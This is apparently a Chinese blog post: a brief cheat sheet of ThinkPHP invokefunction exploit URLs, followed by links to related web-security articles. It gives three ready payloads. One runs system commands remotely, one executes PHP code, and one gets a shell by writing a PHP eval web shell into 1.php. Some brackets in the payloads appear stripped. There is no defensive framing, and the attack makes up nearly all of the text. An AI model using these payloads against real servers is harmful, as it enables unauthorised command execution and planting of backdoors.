Thinkphp(TP)

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars0=phpinfo&vars1\[\]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=echo '<?php @eval($_POSTcmd);?>' >1.php

相关推荐
云水一下18 小时前
零基础玩转bWAPP靶场(二十八):SQL 注入——盲注(SQLite)
web安全·sql注入·bwapp
Chengbei1119 小时前
云存储桶漏洞检测工具OSS-2.0更新,全类型文件解析,存储桶遍历 + 敏感排查一站式完成渗透取证
网络·安全·web安全·网络安全·xss
白猫不黑1 天前
GitHub 30K Star 的 AI 渗透测试工具
web安全·网络安全·信息安全·渗透测试·github·ai渗透测试
云水一下2 天前
零基础玩转bWAPP靶场(二十七):SQL 注入——时间型盲注
web安全·sql注入·bwapp
艺杯羹2 天前
公共 Wi-Fi 流量安全全解析:从明文监听、流量拦截到 HTTPS 降级攻防
网络·web安全·网络安全·wifi
江湖浩淼3 天前
CVE-2021-4034-pwnkit提权
安全·web安全
Sagittarius_A*3 天前
【RCELABS】Level 17~18 —— PHP命令执行函数与环境变量注入
开发语言·安全·web安全·靶场·php·rce
网络安全零基础教程3 天前
零基础转行网安,前两个月具体该学什么工具
网络·学习·安全·web安全·网络安全
白猫不黑4 天前
Web 应用中“敏感信息泄露“的常见位置?
前端·网络·web安全·网络安全·信息安全·渗透测试
网络安全零基础教程5 天前
网络安全春招面试避坑与复盘指南
linux·网络·安全·web安全·面试·职场和发展